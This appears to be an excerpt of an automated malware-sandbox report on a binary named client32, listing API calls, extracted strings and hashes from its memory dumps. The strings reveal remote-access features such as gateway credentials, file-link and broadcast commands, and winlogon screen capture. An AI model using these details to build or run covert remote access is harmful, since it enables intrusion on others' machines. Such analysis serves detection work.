                                                                                                • DeleteObject.GDI32(?), ref: 11005638
                                                                                                • DeleteObject.GDI32(?), ref: 11005641
                                                                                                • ShowWindow.USER32(?,00000009), ref: 1100566F
                                                                                                • PostQuitMessage.USER32(00000000), ref: 11005677
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Object$Delete$Select$MessagePostQuitShowWindow__itow_malloc_memsetwsprintf
                                                                                                • String ID: %d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s$Annotate$FillColour$FillStyle$Font$PenColour$PenStyle$PenWidth$Tool
                                                                                                • API String ID: 2789700732-770455996
                                                                                                • Opcode ID: 131ea691aa0fa706e41bd5a286a094aecf96abdf924dd2abea111bdf7eb7d0a0
                                                                                                • Instruction ID: fd76b8300a222304a99732cac27ba94327f80de35dfbaf81c148901aa75ffadf
                                                                                                • Opcode Fuzzy Hash: 131ea691aa0fa706e41bd5a286a094aecf96abdf924dd2abea111bdf7eb7d0a0
                                                                                                • Instruction Fuzzy Hash: 24813775600609AFD368DBA5CD91EABF7F9BF8C704F00494DE5AAA7241CA74F801CB60
                                                                                                APIs
                                                                                                  • Part of subcall function 69CF75B0: _malloc.LIBCMT ref: 69CF75D8
                                                                                                  • Part of subcall function 69CF7D00: __vswprintf.LIBCMT ref: 69CF7D26
                                                                                                  • Part of subcall function 69CE5060: _free.LIBCMT ref: 69CE506A
                                                                                                  • Part of subcall function 69CE5060: _malloc.LIBCMT ref: 69CE5090
                                                                                                • _free.LIBCMT ref: 69CEBF22
                                                                                                  • Part of subcall function 69D01BFD: HeapFree.KERNEL32(00000000,00000000), ref: 69D01C13
                                                                                                  • Part of subcall function 69D01BFD: GetLastError.KERNEL32(00000000), ref: 69D01C25
                                                                                                • _free.LIBCMT ref: 69CEBF51
                                                                                                • _free.LIBCMT ref: 69CEBF7C
                                                                                                • _free.LIBCMT ref: 69CEC005
                                                                                                • _free.LIBCMT ref: 69CEC034
                                                                                                • _free.LIBCMT ref: 69CEC063
                                                                                                • _free.LIBCMT ref: 69CEC109
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$_malloc$ErrorFreeHeapLast__vswprintf
                                                                                                • String ID: APPTYPE=%d$BFLG=%d$DA=%d$DATA=$DEPT=%s$ED=%s$ID=%d$MO=%d$OC=%d$SD=%s$TIMING=%d$TM=%s$TZ=%d$UID=%s$UN=%s$WD=%u$WP=%d$YR=%d
                                                                                                • API String ID: 2888336863-1668223812
                                                                                                • Opcode ID: 4c000cef9143de4d8d7169f536770d3f3fca4c0c073d22519dd66edc452ae778
                                                                                                • Instruction ID: 7c75a6b5b0aa230a7372e2bf0b760c5de4afad3bce67305ea089d12f827fda99
                                                                                                • Opcode Fuzzy Hash: 4c000cef9143de4d8d7169f536770d3f3fca4c0c073d22519dd66edc452ae778
                                                                                                • Instruction Fuzzy Hash: 8D5170B95002047BEB51DF21EC84E7F73ACAF4561CF80E428F91A96A05FB35E905A7B1
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(psapi.dll), ref: 1110708D
                                                                                                  • Part of subcall function 11138260: GetVersion.KERNEL32(00000000,756F4977,00000000), ref: 11138283
                                                                                                  • Part of subcall function 11138260: GetModuleHandleA.KERNEL32(ntdll.dll), ref: 111382A4
                                                                                                  • Part of subcall function 11138260: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 111382B4
                                                                                                  • Part of subcall function 11138260: GetModuleHandleA.KERNEL32(KERNEL32.DLL), ref: 111382D1
                                                                                                  • Part of subcall function 11138260: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoA), ref: 111382DD
                                                                                                  • Part of subcall function 11138260: _memset.LIBCMT ref: 111382F7
                                                                                                • FreeLibrary.KERNEL32(00000000,?,1110809F,00000000,?,11030250,00000000,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF), ref: 111070DF
                                                                                                • LoadLibraryA.KERNEL32(Kernel32.dll), ref: 11107116
                                                                                                • GetProcAddress.KERNEL32(00000000,WTSGetActiveConsoleSessionId,?,1110809F), ref: 111071A0
                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcesses,?,1110809F), ref: 111071F1
                                                                                                • GetProcAddress.KERNEL32(?,ProcessIdToSessionId,?,1110809F), ref: 1110726A
                                                                                                • SetLastError.KERNEL32(00000078,?,1110809F), ref: 1110728C
                                                                                                • SetLastError.KERNEL32(00000078,?,1110809F), ref: 111072A3
                                                                                                • SetLastError.KERNEL32(00000078,?,1110809F), ref: 111072B0
                                                                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,1110809F), ref: 111072D0
                                                                                                  • Part of subcall function 110262F0: GetProcAddress.KERNEL32(00000000,GetProcessImageFileNameA,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026306
                                                                                                  • Part of subcall function 110262F0: K32GetProcessImageFileNameA.KERNEL32(?,00000000,11030983,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026322
                                                                                                  • Part of subcall function 110262F0: GetProcAddress.KERNEL32(?,GetModuleFileNameExA,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026336
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 11107446
                                                                                                  • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                                • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,00000000,?,00000104,?,1110809F), ref: 11107360
                                                                                                • GetTokenInformation.ADVAPI32(?,0000000C(TokenIntegrityLevel),?,00000004,?,?,00000000,?,00000104,?,1110809F), ref: 1110738F
                                                                                                • CloseHandle.KERNEL32(?), ref: 1110743F
                                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,1110809F), ref: 111074CC
                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,1110809F), ref: 111074D3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressProc$Library$Handle$ErrorFreeLastProcess$CloseLoadModuleOpenToken$FileImageInformationNameVersion_memset_strrchr
                                                                                                • String ID: EnumProcesses$Kernel32.dll$ProcessIdToSessionId$WTSGetActiveConsoleSessionId$dwm.exe$psapi.dll$winlogon.exe
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$_memset$lstrlen
                                                                                                • String ID: *ControlPort$*Gsk$AT=%d$CHANNEL=%s$CMD=BROADCASTDATA$CSPEC=%s$DATA=$FLAGS=%u$FROM=%s:%d$GSK=%s$Gateway_Gsk$LEN=%d$ListenPort$Port$TCPIP$ctl_broadcastdata - INVALID PARAMETER
                                                                                                APIs
                                                                                                • SetEvent.KERNEL32(00000180), ref: 69CEEEC7
                                                                                                • WaitForSingleObject.KERNEL32(00000184,00001388), ref: 69CEEED5
                                                                                                • TerminateThread.KERNEL32(00000184,000000FF), ref: 69CEEEF5
                                                                                                • CloseHandle.KERNEL32(00000184), ref: 69CEEF07
                                                                                                • SetEvent.KERNEL32(00000174), ref: 69CEEF16
                                                                                                • ctl_hangup.HTCTL32(00000001), ref: 69CEEF26
                                                                                                • Sleep.KERNEL32(00000014), ref: 69CEEFB8
                                                                                                • CloseHandle.KERNEL32(00000180), ref: 69CEEFCE
                                                                                                • CloseHandle.KERNEL32(0000017C), ref: 69CEEFD6
                                                                                                • CloseHandle.KERNEL32(00000174), ref: 69CEEFDF
                                                                                                • WSACleanup.WSOCK32 ref: 69CEEFE9
                                                                                                • CloseHandle.KERNEL32(00000188), ref: 69CEEFFB
                                                                                                • DeleteCriticalSection.KERNEL32(00000002), ref: 69CEF01F
                                                                                                • DeleteCriticalSection.KERNEL32(69D2B898), ref: 69CEF03A
                                                                                                • _free.LIBCMT ref: 69CEF043
                                                                                                  • Part of subcall function 69D01BFD: HeapFree.KERNEL32(00000000,00000000), ref: 69D01C13
                                                                                                  • Part of subcall function 69D01BFD: GetLastError.KERNEL32(00000000), ref: 69D01C25
                                                                                                • _free.LIBCMT ref: 69CEF04F
                                                                                                • _free.LIBCMT ref: 69CEF07B
                                                                                                • _free.LIBCMT ref: 69CEF08D
                                                                                                • _memset.LIBCMT ref: 69CEF0A1
                                                                                                • FreeLibrary.KERNEL32(?), ref: 69CEF0BB
                                                                                                • timeEndPeriod.WINMM(00000001), ref: 69CEF0D6
                                                                                                  • Part of subcall function 69CE4610: DeleteCriticalSection.KERNEL32(-00000008,?), ref: 69CE4698
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseHandle$_free$CriticalDeleteSection$EventFree$CleanupErrorHeapLastLibraryObjectPeriodSingleSleepTerminateThreadWait_memsetctl_hanguptime
                                                                                                • String ID: CMD=CLOSE$Error. Terminating httprecv Thread
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,69D058B5,69D27218,00000008,69D05A49,?,?,?,69D27238,0000000C,69D05B04,?), ref: 69D0712F
                                                                                                • __mtterm.LIBCMT ref: 69D0713B
                                                                                                  • Part of subcall function 69D06DFA: DecodePointer.KERNEL32(00000007,69D05978,69D0595E,69D27218,00000008,69D05A49,?,?,?,69D27238,0000000C,69D05B04,?), ref: 69D06E0B
                                                                                                  • Part of subcall function 69D06DFA: TlsFree.KERNEL32(00000021,69D05978,69D0595E,69D27218,00000008,69D05A49,?,?,?,69D27238,0000000C,69D05B04,?), ref: 69D06E25
                                                                                                  • Part of subcall function 69D06DFA: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,69D05978,69D0595E,69D27218,00000008,69D05A49,?,?,?,69D27238,0000000C,69D05B04,?), ref: 69D0F391
                                                                                                  • Part of subcall function 69D06DFA: _free.LIBCMT ref: 69D0F394
                                                                                                  • Part of subcall function 69D06DFA: DeleteCriticalSection.KERNEL32(00000021,?,?,69D05978,69D0595E,69D27218,00000008,69D05A49,?,?,?,69D27238,0000000C,69D05B04,?), ref: 69D0F3BB
                                                                                                • GetProcAddress.KERNEL32(00000000,FlsAlloc,?,?,69D058B5,69D27218,00000008,69D05A49,?,?,?,69D27238,0000000C,69D05B04,?), ref: 69D07151
                                                                                                • GetProcAddress.KERNEL32(00000000,FlsGetValue,?,?,69D058B5,69D27218,00000008,69D05A49,?,?,?,69D27238,0000000C,69D05B04,?), ref: 69D0715E
                                                                                                • GetProcAddress.KERNEL32(00000000,FlsSetValue,?,?,69D058B5,69D27218,00000008,69D05A49,?,?,?,69D27238,0000000C,69D05B04,?), ref: 69D0716B
                                                                                                • GetProcAddress.KERNEL32(00000000,FlsFree,?,?,69D058B5,69D27218,00000008,69D05A49,?,?,?,69D27238,0000000C,69D05B04,?), ref: 69D07178
                                                                                                • TlsAlloc.KERNEL32(?,?,69D058B5,69D27218,00000008,69D05A49,?,?,?,69D27238,0000000C,69D05B04,?), ref: 69D071C8
                                                                                                • TlsSetValue.KERNEL32(00000000,?,?,69D058B5,69D27218,00000008,69D05A49,?,?,?,69D27238,0000000C,69D05B04,?), ref: 69D071E3
                                                                                                • __init_pointers.LIBCMT ref: 69D071ED
                                                                                                • EncodePointer.KERNEL32(?,?,69D058B5,69D27218,00000008,69D05A49,?,?,?,69D27238,0000000C,69D05B04,?), ref: 69D071FE
                                                                                                • EncodePointer.KERNEL32(?,?,69D058B5,69D27218,00000008,69D05A49,?,?,?,69D27238,0000000C,69D05B04,?), ref: 69D0720B
                                                                                                • EncodePointer.KERNEL32(?,?,69D058B5,69D27218,00000008,69D05A49,?,?,?,69D27238,0000000C,69D05B04,?), ref: 69D07218
                                                                                                • EncodePointer.KERNEL32(?,?,69D058B5,69D27218,00000008,69D05A49,?,?,?,69D27238,0000000C,69D05B04,?), ref: 69D07225
                                                                                                • DecodePointer.KERNEL32(Function_00026F7E,?,?,69D058B5,69D27218,00000008,69D05A49,?,?,?,69D27238,0000000C,69D05B04,?), ref: 69D07246
                                                                                                • __calloc_crt.LIBCMT ref: 69D0725B
                                                                                                • DecodePointer.KERNEL32(00000000,?,?,69D058B5,69D27218,00000008,69D05A49,?,?,?,69D27238,0000000C,69D05B04,?), ref: 69D07275
                                                                                                • GetCurrentThreadId.KERNEL32(?,?,69D058B5,69D27218,00000008,69D05A49,?,?,?,69D27238,0000000C,69D05B04,?), ref: 69D07287
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                                • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                APIs
                                                                                                  • Part of subcall function 69CE2A90: GetModuleFileNameA.KERNEL32(00000000,?,00000100), ref: 69CE2ACB
                                                                                                  • Part of subcall function 69CE2A90: _strrchr.LIBCMT ref: 69CE2ADA
                                                                                                  • Part of subcall function 69CE2A90: _strrchr.LIBCMT ref: 69CE2AEA
                                                                                                  • Part of subcall function 69CE2A90: wsprintfA.USER32 ref: 69CE2B05
                                                                                                • GetModuleHandleA.KERNEL32(NSMTRACE,69CE2AB1), ref: 69CE2CFA
                                                                                                • GetProcAddress.KERNEL32(00000000,NSMTraceLoad), ref: 69CE2D15
                                                                                                • GetProcAddress.KERNEL32(00000000,NSMTraceUnload), ref: 69CE2D22
                                                                                                • GetProcAddress.KERNEL32(00000000,NSMTraceGetConfigItem), ref: 69CE2D2F
                                                                                                • GetProcAddress.KERNEL32(00000000,NSMTraceGetConfigInt), ref: 69CE2D3C
                                                                                                • GetProcAddress.KERNEL32(00000000,vRealNSMTrace), ref: 69CE2D49
                                                                                                • GetProcAddress.KERNEL32(00000000,NSMTraceClose), ref: 69CE2D56
                                                                                                • GetProcAddress.KERNEL32(00000000,NSMTraceReadConfigItemFromFile), ref: 69CE2D63
                                                                                                • GetProcAddress.KERNEL32(00000000,NSMTraceExclusive), ref: 69CE2D70
                                                                                                • GetProcAddress.KERNEL32(00000000,NSMTraceUnexclusive), ref: 69CE2D7D
                                                                                                • GetProcAddress.KERNEL32(00000000,NSMTraceSetModuleName), ref: 69CE2D8A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressProc$Module_strrchr$FileHandleNamewsprintf
                                                                                                • String ID: NSMTRACE$NSMTraceClose$NSMTraceExclusive$NSMTraceGetConfigInt$NSMTraceGetConfigItem$NSMTraceLoad$NSMTraceReadConfigItemFromFile$NSMTraceSetModuleName$NSMTraceUnexclusive$NSMTraceUnload$vRealNSMTrace
                                                                                                APIs
                                                                                                • OpenFileMappingA.KERNEL32 ref: 1105D277
                                                                                                • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 1105D294
                                                                                                • GetDC.USER32(00000000), ref: 1105D2BB
                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 1105D2CF
                                                                                                • CreateDIBSection.GDI32(00000000,00000004,00000000,?,?,?), ref: 1105D2F2
                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 1105D300
                                                                                                • GetTickCount.KERNEL32 ref: 1105D30F
                                                                                                • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 1105D333
                                                                                                • GetTickCount.KERNEL32 ref: 1105D33C
                                                                                                • GetLastError.KERNEL32(?), ref: 1105D348
                                                                                                • GdiFlush.GDI32 ref: 1105D35C
                                                                                                • SelectObject.GDI32(00000000,?), ref: 1105D367
                                                                                                • DeleteObject.GDI32(00000000), ref: 1105D36E
                                                                                                • DeleteDC.GDI32(00000000), ref: 1105D378
                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 1105D384
                                                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 1105D38E
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 1105D396
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FileObject$CountCreateDeleteSelectTickView$CloseCompatibleErrorFlushHandleLastMappingOpenReleaseSectionUnmap
                                                                                                • String ID: /thumb:$Error %d blitting from winlogon, took %d ms$ThumbWL
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 69CF4D1C
                                                                                                • _free.LIBCMT ref: 69CF4E16
                                                                                                • _free.LIBCMT ref: 69CF4E5D
                                                                                                • _free.LIBCMT ref: 69CF4E8B
                                                                                                • _free.LIBCMT ref: 69CF4EB9
                                                                                                  • Part of subcall function 69CF7B60: _sprintf.LIBCMT ref: 69CF7B77
                                                                                                  • Part of subcall function 69CF77E0: _free.LIBCMT ref: 69CF77EF
                                                                                                • _free.LIBCMT ref: 69CF4EF6
                                                                                                  • Part of subcall function 69CE63C0: EnterCriticalSection.KERNEL32(69D2B898,00000000,?,00000000,?,69CED77B,00000000), ref: 69CE63E8
                                                                                                  • Part of subcall function 69CE63C0: InterlockedDecrement.KERNEL32(-0003F3B7,?,00000000,?,69CED77B,00000000), ref: 69CE63FA
                                                                                                  • Part of subcall function 69CE63C0: EnterCriticalSection.KERNEL32(-0003F3CF,?,00000000,?,69CED77B,00000000), ref: 69CE6412
                                                                                                  • Part of subcall function 69CE63C0: GetProcAddress.KERNEL32(?,InternetCloseHandle,?,00000000,?,69CED77B,00000000), ref: 69CE643B
                                                                                                  • Part of subcall function 69CE63C0: GetProcAddress.KERNEL32(?,InternetCloseHandle,?,00000000,?,69CED77B,00000000), ref: 69CE646F
                                                                                                  • Part of subcall function 69CE63C0: GetProcAddress.KERNEL32(?,InternetCloseHandle,?,00000000,?,69CED77B,00000000), ref: 69CE64A3
                                                                                                  • Part of subcall function 69CE63C0: _memset.LIBCMT ref: 69CE65C8
                                                                                                  • Part of subcall function 69CE63C0: LeaveCriticalSection.KERNEL32(?,?,69CED77B,00000000), ref: 69CE65D7
                                                                                                  • Part of subcall function 69CE63C0: LeaveCriticalSection.KERNEL32(69D2B898,?,00000000,?,69CED77B,00000000), ref: 69CE65F2
                                                                                                • _free.LIBCMT ref: 69CF4EED
                                                                                                  • Part of subcall function 69D01BFD: HeapFree.KERNEL32(00000000,00000000), ref: 69D01C13
                                                                                                  • Part of subcall function 69D01BFD: GetLastError.KERNEL32(00000000), ref: 69D01C25
                                                                                                • _free.LIBCMT ref: 69CF4F09
                                                                                                • SetLastError.KERNEL32(?), ref: 69CF4F12
                                                                                                  • Part of subcall function 69CE8C30: _memset.LIBCMT ref: 69CE8C5B
                                                                                                  • Part of subcall function 69CE8C30: _free.LIBCMT ref: 69CE8CCC
                                                                                                  • Part of subcall function 69CE8B50: _memset.LIBCMT ref: 69CE8B68
                                                                                                  • Part of subcall function 69CE8B50: wsprintfA.USER32 ref: 69CE8B87
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$CriticalSection_memset$AddressProc$EnterErrorLastLeave$DecrementFreeHeapInterlocked_sprintfwsprintf
                                                                                                • String ID: CMD=PUTFILELINK$FNAME=%s$GSK=%s$Gateway_Gsk$Gateway_Operator$Gateway_Password$LINK=%s$ON=%s$PWD=%s$SUB=%s
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(winhttp.dll), ref: 69D01177
                                                                                                • GetProcAddress.KERNEL32(00000000,WinHttpGetIEProxyConfigForCurrentUser), ref: 69D011AE
                                                                                                • GlobalFree.KERNEL32(?), ref: 69D011D4
                                                                                                • GlobalFree.KERNEL32(?), ref: 69D011E5
                                                                                                • GetProcAddress.KERNEL32(00000000,WinHttpOpen), ref: 69D01207
                                                                                                • GetProcAddress.KERNEL32(00000000,WinHttpGetProxyForUrl), ref: 69D012AD
                                                                                                • __strdup.LIBCMT ref: 69D012FC
                                                                                                • GlobalFree.KERNEL32(?), ref: 69D0130D
                                                                                                • GlobalFree.KERNEL32(?), ref: 69D01328
                                                                                                • GetProcAddress.KERNEL32(00000000,WinHttpCloseHandle), ref: 69D01334
                                                                                                • GlobalFree.KERNEL32(?), ref: 69D0134E
                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 69D01359
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Free$Global$AddressProc$Library$Load__strdup
                                                                                                • String ID: NS247$WinHttpCloseHandle$WinHttpGetIEProxyConfigForCurrentUser$WinHttpGetProxyForUrl$WinHttpOpen$winhttp.dll
                                                                                                APIs
                                                                                                • GetPrivateProfileIntA.KERNEL32(htctl.packet_tracing,nextfileindex,00000001,C:\ProgramData\i99ekubc\Support\pci.ini), ref: 69CE5131
                                                                                                • wsprintfA.USER32 ref: 69CE514A
                                                                                                • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 69CE5168
                                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 69CE5172
                                                                                                • GetPrivateProfileIntA.KERNEL32(htctl.packet_tracing,maxfilesize,000003E8,C:\ProgramData\i99ekubc\Support\pci.ini), ref: 69CE5191
                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 69CE51B2
                                                                                                • FlushFileBuffers.KERNEL32(00000000,?,69CE9B16,00000001), ref: 69CE51D8
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 69CE51E4
                                                                                                • wsprintfA.USER32 ref: 69CE5225
                                                                                                • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 69CE5243
                                                                                                • __itow.LIBCMT ref: 69CE5265
                                                                                                • WritePrivateProfileStringA.KERNEL32(htctl.packet_tracing,nextfileindex,00000000), ref: 69CE5278
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$PrivateProfile$Createwsprintf$BuffersCloseFlushHandlePointerSizeStringWrite__itow
                                                                                                • String ID: %spacket%03d.trc$C:\ProgramData\i99ekubc\Support\$C:\ProgramData\i99ekubc\Support\pci.ini$htctl.packet_tracing$maxfilesize$nextfileindex
                                                                                                APIs
                                                                                                  • Part of subcall function 69CFDBD0: _malloc.LIBCMT ref: 69CFDBE9
                                                                                                  • Part of subcall function 69CFDBD0: wsprintfA.USER32 ref: 69CFDC04
                                                                                                  • Part of subcall function 69CFDBD0: _memset.LIBCMT ref: 69CFDC27
                                                                                                • _memset.LIBCMT ref: 69CF0FAD
                                                                                                • EnterCriticalSection.KERNEL32(69D2B898,69D20E3D,?,?,?,?,?,?,00000000), ref: 69CF1293
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898,?,?,?,?,?,?,00000000), ref: 69CF12E3
                                                                                                • EnterCriticalSection.KERNEL32(69D2B898,69D20E3D,?,?,?,?,?,?,00000000), ref: 69CF1316
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898,?,?,?,?,?,?,00000000), ref: 69CF132D
                                                                                                • std::exception::exception.LIBCMT ref: 69CF135B
                                                                                                • __CxxThrowException@8.LIBCMT ref: 69CF1376
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterLeave_memset$Exception@8Throw_mallocstd::exception::exceptionwsprintf
                                                                                                • String ID: CAP$ENC$END_REC$FLG$MORE$RESULT$TIM$TXT$UID$b
                                                                                                • API String ID: 275297366-914382535
                                                                                                • Opcode ID: 21080207ac82195cd5433d1009bb770e0d118809fa449bf12a6aff8f6259551a
                                                                                                • Instruction ID: b0f82785e32700f2528cb876150c04b1d1469ce86750bbdf81f2772c3dff587f
                                                                                                • Opcode Fuzzy Hash: 21080207ac82195cd5433d1009bb770e0d118809fa449bf12a6aff8f6259551a
                                                                                                • Instruction Fuzzy Hash: 70C18EF5C002599BDF50DFA4EC81AAEB7B4BF04308F40917AE50AA6641F7345B5ACB62
                                                                                                APIs
                                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                • wsprintfA.USER32 ref: 110EB5D8
                                                                                                • GetTickCount.KERNEL32(_debug,TracePlugins,00000000,00000000,?,?,00000000), ref: 110EB632
                                                                                                • SendMessageA.USER32(?,0000004A,?,?,?,00000000), ref: 110EB646
                                                                                                • GetTickCount.KERNEL32(?,0000004A,?,?,?,00000000), ref: 110EB64E
                                                                                                • SendMessageTimeoutA.USER32(?,0000004A,?,?,00000000,?,?), ref: 110EB696
                                                                                                • OpenEventA.KERNEL32(00000002,00000000,runplugin.dmp.1,?,00000000), ref: 110EB6C8
                                                                                                • SetEvent.KERNEL32(00000000,?,00000000), ref: 110EB6D5
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 110EB6DC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CountEventMessageSendTick$CloseHandleOpenTimeout__wcstoi64wsprintf
                                                                                                • String ID: %s$DATA$Error. Runplugin is unresponsive$INIT$TracePlugins$Warning: SendMessage to Runplugin took %d ms (possibly unresponsive)$_debug$runplugin %s (hWnd=%x,u=%d,64=%d) $runplugin.dmp.1
                                                                                                • API String ID: 3451743168-2289091950
                                                                                                • Opcode ID: ead4b02f65febedee58ec954df4c387db7c39c25c30fbfeabe7c28379be18f45
                                                                                                • Instruction ID: 06eeb675c9fb82aaee3c5e1b90d71b9ae50c85907530b7dc4e87486fa2a47647
                                                                                                • Opcode Fuzzy Hash: ead4b02f65febedee58ec954df4c387db7c39c25c30fbfeabe7c28379be18f45
                                                                                                • Instruction Fuzzy Hash: A141E775A012199FD724CFA5DC84FAEF7B8EF48304F1085AAE91AA7640D631AD40CFB1
                                                                                                APIs
                                                                                                • __wcstoui64.LIBCMT ref: 69CEA057
                                                                                                  • Part of subcall function 69D049AE: strtoxl.LIBCMT ref: 69D049D0
                                                                                                • ctl_getsession.HTCTL32(?), ref: 69CEA09B
                                                                                                • EnterCriticalSection.KERNEL32(69D2B898,?), ref: 69CEA0BA
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898), ref: 69CEA0EB
                                                                                                • _strncat.LIBCMT ref: 69CEA132
                                                                                                • _free.LIBCMT ref: 69CEA22F
                                                                                                • _free.LIBCMT ref: 69CEA238
                                                                                                Strings
                                                                                                Memory Dump Source
